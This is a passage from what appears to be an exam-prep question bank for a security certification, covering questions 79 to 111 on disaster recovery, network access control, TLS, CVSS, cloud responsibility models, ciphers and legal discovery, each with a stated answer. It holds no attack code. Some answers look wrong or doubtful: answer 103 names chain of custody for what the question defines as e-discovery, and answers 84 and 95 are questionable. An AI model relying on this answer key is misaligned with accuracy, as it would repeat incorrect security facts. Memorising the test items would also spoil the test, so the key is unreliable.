C. Perform reverse engineering on the code and rewrite the code in a more secure manner.
D. Perform fuzz testing and implement DAST in the code repositories to find vulnerabilities prior to deployment.

Answer 79

B. Perform software composition analysis and remediate vulnerabilities found in the software.

Question 80

A significant weather event caused all systems to fail over to the disaster recovery site successfully. However, successful data replication has not occurred in the last six months, which has resulted in the service being unavailable.

Which of the following would BEST prevent this scenario form happening again?

A. Performing routine tabletop exercises
B. Implementing scheduled, full interruption tests
C. Backing up system log reviews
D. Performing department disaster recovery walk-throughs

Answer 80

B. Implementing scheduled, full interruption tests

Question 81

An organization developed an incident response plan.

Which of the following would be BEST to assess the effectiveness of the plan?

A. Requesting a third-party review
B. Generating a checklist by organizational unit
C. Establishing role succession and call lists
D. Creating a playbook
E. Performing a tabletop exercise

Answer 81

E. Performing a tabletop exercise

Question 82

A new mandate by the corporate security team requires that all endpoints must meet a security baseline before accessing the corporate network. All servers and desktop computers are scanned by the dedicated internal scanner appliance installed in each subnet. However, remote worker laptops do not access the network regularly. Which of the following is the BEST option for the security team to ensure remote worker laptops are scanned before being granted access to the corporate network?

A. Implement network access control to perform host validation of installed patches.
B. Create an 802.1X implementation with certificate-based device identification.
C. Create a vulnerability scanning subnet for remote workers to connect to on the network at
headquarters.
D. Install a vulnerability scanning agent on each remote laptop to submit scan data.

Answer 82

D. Install a vulnerability scanning agent on each remote laptop to submit scan data.

Question 83

A security analyst has concerns about malware on an endpoint. The malware is unable to detonate by modifying the kernel response to various system calls. As a test, the analyst modifies
a Windows server to respond to system calls as if it was a Linux server. In another test, the analyst modifies the operating system to prevent the malware from identifying target files.

Which of the following techniques is the analyst MOST likely using?

A. Honeypot
B. Deception
C. Simulators
D. Sandboxing

Answer 83

B. Deception

Question 84

A penetration tester is testing a company’s login form for a web application using a list of known usernames and a common password list. According to a brute-force utility, the penetration tester needs to provide the tool with the proper headers, POST URL with variable names, and the error string returned with an improper login.

Which of the following would BEST help the tester to gather this information? (Choose two.)

A. The new source feature of the web browser
B. The logs from the web server
C. The inspect feature from the web browser
D. A tcpdump from the web server
E. An HTTP interceptor
F. The website certificate viewed via the web browser

Answer 84

D & E

Question 85

An architect is designing security scheme for an organization that is concerned about APTs. Any proposed architecture must meet the following requirements:

• Services must be able to be reconstituted quickly from a known-good state.
• Network services must be designed to ensure multiple diverse layers of redundancy.
• Defensive and responsive actions must be automated to reduce human operator demands.

Which of the following designs must be considered to ensure the architect meets these requirements? (Choose three.)

A. Increased efficiency by embracing advanced caching capabilities
B. Geographic distribution of critical data and services
C. Hardened and verified container usage
D. Emulated hardware architecture usage
E. Establishment of warm and hot sites for continuity of operations
F. Heterogeneous architecture
G. Deployment of IPS services that can identify and block malicious traffic
H. Implementation and configuration of a SOAR

Answer 85

B, C, H

Question 86

A company is on a deadline to roll out an entire CRM platform to all users at one time. However, the company is behind schedule due to reliance on third-party vendors. Which of the following development approaches will allow the company to begin releases but also continue testing and development for future releases?

A. Implement iterative software releases
B. Revise the scope of the project to use a waterfall approach.
C. Change the scope of the project to use the spiral development methodology.
D. Perform continuous integration.

Answer 86

A. Implement iterative software releases

Question 87

A third-party organization has implemented a system that allows it to analyze customers’ data and deliver analysis results without being able to see the raw data.

Which of the following is the organization implementing?

A. Asynchronous keys
B. Homomorphic encryption
C. Data lake
D. Machine learning

Answer 87

B. Homomorphic encryption

Question 88

Which of the following communication protocols is used to create PANs with small, low-power digital radios and supports a large number of nodes?

A. Zigbee
B. Wi-Fi
C. CAN
D. Modbus
E. DNP3

Answer 88

A. Zigbee

Question 89

A software development company is building a new mobile application for its social media platform. The company wants to gain its users’ trust by reducing the risk of on-path attacks between the mobile client and its servers and by implementing stronger digital trust.

To support users’ trust, the company has released the following internal guidelines:
- Mobile clients should verity the identity of all social media servers locally.
- Social media servers should improve TLS performance of their certificate status.
- Social media servers should inform the client to only use HTTPS.

Given the above requirements, which of the following should the company implement? (Choose two.)

A. Quick UDP internet connection
B. OCSP stapling
C. Private CA
D. DNSSEC
E. CRL
F. HSTS
G. Distributed object model

Answer 89

B & F

Question 90

Due to budget constraints, an organization created a policy that only permits vulnerabilities rated high and critical according to CVSS to be fixed or mitigated. A security analyst notices that many vulnerabilities that were previously scored as medium are now breaching higher thresholds. Upon further investigation, the analyst notices certain ratings are not aligned with the approved system categorization.

Which of the following can the analyst do to get a better picture of the risk while adhering to the organization’s policy?

A. Align the exploitability metrics to the predetermined system categorization.
B. Align the remediation levels to the predetermined system categorization.
C. Align the impact subscore requirements to the predetermined system categorization.
D. Align the attack vectors to the predetermined system categorization.

Answer 90

C. Align the impact subscore requirements to the predetermined system categorization.

Question 91

A cloud engineer is tasked with improving the responsiveness and security of a company’s cloud based web application. The company is concerned that international users will experience
increased latency.

Which of the following is the BEST technology to mitigate this concern?

A. Caching
B. Containerization
C. Content delivery network
D. Clustering

Answer 91

C. Content delivery network

Question 92

An organization thinks that its network has active, malicious activity on it. Which of the following capabilities would BEST help to expose the adversary?

A. Installing a honeypot and other decoys
B. Expanding SOC functions to include hunting
C. Enumerating asset configurations
D. Performing a penetration test

Answer 92

B. Expanding SOC functions to include hunting

Question 93

An engineering team has deployed a new VPN service that requires client certificates to be used in order to successfully connect. On iOS devices, however, the following error occurs after importing the .p12 certificate file:

mbedTLS: ca certificate is undefined

Which of the following is the root cause of this issue?

A. iOS devices have an empty root certificate chain by default.
B. OpenSSL is not configured to support PKCS#12 certificate files.
C. The VPN client configuration is missing the CA private key.
D. The iOS keychain imported only the client public and private keys.

Answer 93

D. The iOS keychain imported only the client public and private keys.

Question 94

A security engineer has been informed by the firewall team that a specific Windows workstation is part of a command-and-control network. The only information the security engineer is receiving is that the traffic is occurring on a non-standard port (TCP 40322). Which of the following commands should the security engineer use FIRST to find the malicious process?

A. tcpdump
B. netstat
C. tasklist
D. traceroute
E. ipconfig

Answer 94

B. netstat

Question 95

In a shared responsibility model for PaaS, which of the following is a customer’s responsibility?

A. Network security
B. Physical security
C. OS security
D. Host infrastructure

Answer 95

A. Network security

Question 96

A security engineer notices the company website allows users to select which country they reside in, such as the following example:

https://mycompany.com/main.php?Country=US

Which of the following vulnerabilities would MOST likely affect this site?

A. SQL injection
B. Remote file inclusion
C. Directory traversal
D. Unsecure references

Answer 96

B. Remote file inclusion

Question 97

A bank has multiple subsidiaries that have independent infrastructures. The bank’s support teams manage all these environments and want to use a single set of credentials.

Which of the following is the BEST way to achieve this goal?

A. SSO
B. Federation
C. Cross-domain
D. Shared credentials

Answer 97

B. Federation

Question 98

A SaaS startup is maturing its DevSecOps program and wants to identify weaknesses earlier in the development process in order to reduce the average time to identify serverless application vulnerabilities and the costs associated with remediation. The startup began its early security testing efforts with DAST to cover public-facing application components and recently implemented a bug bounty program.

Which of the following will BEST accomplish the company’s
objectives? (Choose two.)

A. IAST
B. RASP
C. SAST
D. SCA
E. WAF
F. CMS

Answer 98

A & C

Question 99

Which of the following indicates when a company might not be viable after a disaster?

A. Maximum tolerable downtime
B. Recovery time objective
C. Mean time to recovery
D. Annual loss expectancy

Answer 99

A. Maximum tolerable downtime

Question 100

During an incident, an employee’s web traffic was redirected to a malicious domain. The workstation was compromised, and the attacker was able to modify sensitive data from the company file server.

Which of the following solutions would have BEST prevented the initial compromise from happening? (Choose two.)

A. DNSSEC
B. FIM
C. Segmentation
D. Firewall
E. DLP
F. Web proxy

Answer 100

A & F

Question 101

A software company wants to build a platform by integrating with another company’s established product. Which of the following provisions would be MOST important to include when drafting an agreement between the two companies?

A. Data sovereignty
B. Shared responsibility
C. Source code escrow
D. Safe harbor considerations

Answer 101

C. Source code escrow

Question 102

An organization had been leveraging RC4 to protect the confidentiality of a continuous, high throughput 4K video stream but must upgrade to a more modern cipher. The new cipher must maximize speed, particularly on endpoints without crypto instruction sets or coprocessors.

Which of the following is MOST likely to meet the organization’s requirements?

A. ChaCha20
B. ECDSA
C. Blowfish
D. AES-GCM
E. AES-CBC

Answer 102

A. ChaCha20

Question 103

Which of the following processes involves searching and collecting evidence during an investigation or lawsuit?

A. E-discovery
B. Review analysis
C. Information governance
D. Chain of custody

Answer 103

D. Chain of custody

Question 104

A domestic, publicly traded, online retailer that sells makeup would like to reduce the risks to the most sensitive type of data within the organization but also the impact to compliance. A risk analyst is performing an assessment of the collection and processing of data used within business processes.

Which of the following types of data pose the GREATEST risk? (Choose two.)

A. Financial data from transactions
B. Shareholder meeting minutes
C. Data of possible European customers
D. Customers’ shipping addresses
E. Deidentified purchasing habits
F. Consumer product purchasing trends

Answer 104

A & C

Question 105

A security engineer is creating a single CSR for the following web server hostnames:

• wwwint.internal
• www.company.com
• home.internal
• www.internal

Which of the following would meet the requirement?

A. SAN
B. CN
C. CA
D. CRL
E. Issuer

Answer 105

A. SAN

Question 106

A managed security provider (MSP) is engaging with a customer who was working through a complete digital transformation. Part of this transformation involves a move to cloud servers to ensure a scalable, high-performance, online user experience. The current architecture includes:

• Directory servers
• Web servers
• Database servers
• Load balancers
• Cloud-native VPN concentrator
• Remote access server

The MSP must secure this environment similarly to the infrastructure on premises.

Which of the following should the MSP put in place to BEST meet this objective? (Choose three.)

A. Content delivery network
B. Virtual next-generation firewall
C. Web application firewall
D. Software-defined WAN
E. External vulnerability scans
F. Containers

Answer 106

B, C, E

Question 107

A security analyst has been tasked with providing key information in the risk register.

Which of the following outputs or results would be used to BEST provide the information needed to determine the security posture for a risk decision? (Choose two.)

A. Password cracker
B. SCAP scanner
C. Network traffic analyzer
D. Vulnerability scanner
E. Port scanner
F. Protocol analyzer

Answer 107

B & D

Question 108

An organization is in frequent litigation and has a large number of legal holds. Which of the following types of functionality should the organization’s new email system provide?

A. DLP
B. Encryption
C. E-discovery
D. Privacy-level agreements

Answer 108

C. E-discovery

Question 109

A security engineer based in Iceland works in an environment requiring an on-premises and cloud-based storage solution. The solution should take into consideration the following:

1. The company has sensitive data.
2. The company has proprietary data.
3. The company has its headquarters in Iceland, and the data must always reside in that country.

Which cloud deployment model should be used?

A. Hybrid cloud
B. Community cloud
C. Public cloud
D. Private cloud

Answer 109

A. Hybrid cloud

Question 110

When managing and mitigating SaaS cloud vendor risk, which of the following responsibilities belongs to the client?

A. Data
B. Storage
C. Physical security
D. Network

Answer 110

A. Data

Question 111

Which of the following should be established when configuring a mobile device to protect user
internet privacy, to ensure the connection is encrypted, and to keep user activity hidden? (Choose two.)

A. Proxy
B. Tunneling
C. VDI
D. MDM
E. RDP
F. MAC address randomization

Answer 111

B & F